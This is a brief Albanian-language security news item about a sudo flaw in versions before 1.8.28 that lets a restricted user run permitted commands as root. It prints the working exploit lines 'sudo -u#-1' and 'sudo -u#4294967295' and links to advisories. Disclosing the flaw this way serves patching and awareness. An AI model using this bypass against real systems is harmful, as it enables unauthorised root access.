Një gabim në sudo ju lejon të ekzekutoni çdo skedar të ekzekutueshëm si rrënjë nëse /etc/sudoers lejon që ai të ekzekutohet nga përdorues të tjerë dhe është i ndaluar për rrënjë.
Shfrytëzimi i gabimit është shumë i thjeshtë:
sudo -u#-1 id -u
ose:
sudo -u#4294967295 id -u
Gabimi është i pranishëm në të gjitha versionet e sudo para 1.8.28
Details:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Burimi: linux.org.ru